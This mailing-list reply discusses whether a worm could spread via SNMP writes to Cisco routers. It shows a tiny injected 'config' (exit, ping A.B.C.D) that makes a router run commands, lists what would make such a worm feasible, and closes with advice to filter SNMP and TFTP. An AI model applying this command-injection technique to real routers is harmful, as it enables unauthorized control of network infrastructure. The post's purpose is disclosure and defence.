Re: Router worm exploiting poor SNMP security.

[Lincoln Yeoh <lyeoh () POP JARING MY>]

> can you execute scripts on routers via snmp writes? I thought this required
> console access. Also can you upload files via snmp writes? I would be very
> surprised if you could....

> The only way I could think of doing it is placing the payload in the
> configuration 'script' and reconfiguring via snmp and rebooting forcing a
> re-configure via tftp or whatever, this may be noticed.
>
> I don't know whether this would work i.e. how powerful the configuration
> 'script' can be.

I've mentioned something like this on this list before (
http://www.securityfocus.com/templates/archive.pike?list=82&mid=139708 )

Some years back I learnt that when you send a configuration to Cisco
routers by SNMP you are actually merging the config (not sure if this is
still true with current IOS, go check it out yourself ). You are not
overwriting the config.

So I theorized that the SNMP config was just like doing a config term, only
via SNMP.

And I confirmed it when I created a "config" that went like this:

exit
ping A.B.C.D

Then the router would ping A.B.C.D.
--
The important bits I see for worm writing on Cisco routers are:

1) If you can SNMP write the config, you can execute arbitrary commands.
Not a big deal in itself.

2) Writing the config by SNMP is just merging not totally wiping and
overwriting an existing config (this may have changed, but the method could
still exist). This means you can just change small bits of the config
without screwing up the entire router (and likely the network your worm is
on).

3) Cisco routers can behave as TFTP servers, and can store multiple images.

So worm writing looks possible, not easy but possible.

However router admins can easily filter SNMP and TFTP packets so that only
certain IPs can do SNMP/TFTP with their routers.

So just secure your routers properly and you should have no worm problem.

Cheerio,
Link.